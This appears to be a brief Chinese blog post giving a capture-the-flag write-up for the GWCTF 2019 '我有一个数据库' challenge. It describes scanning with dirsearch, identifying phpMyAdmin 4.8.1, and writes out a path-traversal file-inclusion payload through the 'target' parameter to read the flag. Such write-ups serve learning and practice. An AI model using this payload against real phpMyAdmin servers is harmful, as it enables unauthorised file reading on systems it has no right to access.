Always keep a begi|

Xxiaomaa

园龄:3个月粉丝:0关注:0

Xxiaoma解题 [GWCTF 2019]我有一个数据库

OXO1 打开题目看到

0X02 用kali工具dirsearch扫描后发现有以下网站

0X03 依次查看

0X04 构造payload
发现版本为4.8.1,网上搜一下后发现该版本存在框架代码漏洞可以利用
构造payload为:phpmyadmin/index.php?target=db_datadict.php?../../../../../../../../flag

本文作者:Xxiaomaa

本文链接:https://www.cnblogs.com/mhwq/p/18528154

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   Xxiaomaa  阅读(15)  评论(1编辑  收藏  举报
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起